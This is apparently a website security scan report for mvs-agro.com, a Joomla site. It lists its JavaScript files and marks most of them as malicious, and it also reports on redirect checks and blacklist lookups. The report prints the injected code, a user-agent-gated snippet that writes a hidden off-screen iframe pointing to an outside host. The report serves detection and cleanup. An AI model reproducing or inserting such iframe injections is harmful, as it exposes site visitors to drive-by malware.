Scanned pages/files
Request | Server response | Status |
http://www.mvs-agro.com/ | 200 OK Content-Length: 46844 Content-Type: text/html | clean |
http://www.mvs-agro.com/media/system/js/modal.js | 200 OK Content-Length: 11263 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; }, 'iframe': function(url) { return new Element('iframe', { 'src': url, 'frameBorder': 0, 'width': this.options.size.x, 'height': this.options.size.y }); }, 'string': function(str) { return str; } }, extend: $extend }; SqueezeBox.extend(SqueezeBox, Events.prototype); SqueezeBox.extend(SqueezeBox, Options.prototype); SqueezeBox.extend(SqueezeBox, Chain.prototype);;;;; Antivirus reports:
| ||
http://www.mvs-agro.com/components/com_k2/js/k2.js | 200 OK Content-Length: 3752 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; window.open(this.getProperty('href'),'K2PopUpWindow','width='+options.x+',height='+options.y+',menubar=yes,resizable=yes'); }); }); window.addEvent('load', function(){ if($$('.subCategory')){ var blocks = $$('.subCategory'); var maxHeight = 0; blocks.each(function(item){ maxHeight = Math.max(maxHeight, parseInt(item.getStyle('height'))); }); blocks.setStyle('height', maxHeight); } }); ;;;; Antivirus reports:
| ||
http://www.mvs-agro.com/plugins/content/ja_tabs/ja.tabs.js | 200 OK Content-Length: 15981 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; top -= this.tabwrap.panels[i].offsetHeight; this.tabwrap.panels[i].setStyle('top',top); } var top = this.tabwrap.activePanel.offsetTop; for (i=this.tabwrap.activePanel._idx+1;i<this.tabwrap.panels.length;i++) { top += this.tabwrap.panels[i-1].offsetHeight; this.tabwrap.panels[i].setStyle('top',top); } } } });;;;; Antivirus reports:
| ||
http://www.mvs-agro.com/modules/mod_gk_tab/scripts/engine_compress.js | 200 OK Content-Length: 4274 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; Antivirus reports:
| ||
http://www.mvs-agro.com/modules/mod_gk_tab/scripts/importer.php?modid=tabmix1&activator=click&animation=0&animationFun=Fx.Transitions.Quint.easeInOut&animationType=1&animationSpeed=1000&animationInterval=5000&styleType=0&styleSuffix=style1&fixedHeight=0&fixedHeightValue=200&alwaysHide=1 | 200 OK Content-Length: 375 Content-Type: text/javascript | clean |
http://www.mvs-agro.com/modules/mod_news_pro_gk4/interface/scripts/engine-mootools-11.js | 200 OK Content-Length: 9377 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; $E('.nsp_'+position+'_interface .pagination', module).getElementsBySelector('li')[i].setProperty('class', 'active'); } } function nsp_art_counter(i, module, position, num){ if($E('.nsp_'+position+'_interface .counter', module)){ $E('.nsp_'+position+'_interface .counter span', module).innerHTML = (i+1) + ' / ' + num; } } });;;;; Antivirus reports:
| ||
http://www.mvs-agro.com/modules/mod_jaanimation/assets/script.js | 200 OK Content-Length: 18178 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; this.fireEvent('onShow', [this.toolTip]); }, hide: function(){ this.fireEvent('onHide', [this.toolTip]); }, enableTip: function(el){ if (el) el.tip = 'enabled'; }, disableTip: function(el){ if (el) el.tip = 'disabled'; if (this.curTip && this.curTip == el) this.hide(); } }); JATips.implement(new Events, new Options); ;;;; Antivirus reports:
| ||
http://www.mvs-agro.com/modules/mod_jaslideshow2/assets/script.js | 200 OK Content-Length: 20199 Content-Type: application/x-javascript | clean |
http://www.mvs-agro.com/templates/ja_sargas/scripts/ja.script.js | 200 OK Content-Length: 10913 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; obj = document.getElementById ('ja-topsl3'); if (obj && headerHeight < obj.scrollHeight) headerHeight = obj.scrollHeight; headerStep = parseInt(headerHeight*headerInt / headerDuration); if (headerToggle < 0) { headerToggle = 1; toggleHeader (null); } } window.addEvent ('load', function() { addSpanToTitle(); equalHeight(); }); ;;;; Antivirus reports:
| ||
http://www.mvs-agro.com/templates/ja_sargas/scripts/opacity.js | 200 OK Content-Length: 10354 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px; var pngNormal = true; var strExt = ".png"; } else { var strExt = ".gif"; } var ns = (document.all)?false:true; var browserVersion = parseFloat(navigator.appVersion ); Antivirus reports:
| ||
http://vkontakte.ru/js/api/share.js?10 | 200 OK Content-Length: 10156 Content-Type: application/x-javascript | clean |
http://www.mvs-agro.com/ru.html | 200 OK Content-Length: 48692 Content-Type: text/html | clean |
http://www.mvs-agro.com/?format=html&lang=ru | 200 OK Content-Length: 46566 Content-Type: text/html | clean |
http://www.mvs-agro.com/en.html | 200 OK Content-Length: 45270 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mvs-agro.com
Result:
GET / HTTP/1.1
Host: mvs-agro.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mvs-agro.com
Referer: http://www.google.com/search?q=mvs-agro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mvs-agro.com
Referer: http://www.google.com/search?q=mvs-agro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mvs-agro.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mvs-agro.com/
Result: mvs-agro.com is not infected or malware details are not published yet.
Result: mvs-agro.com is not infected or malware details are not published yet.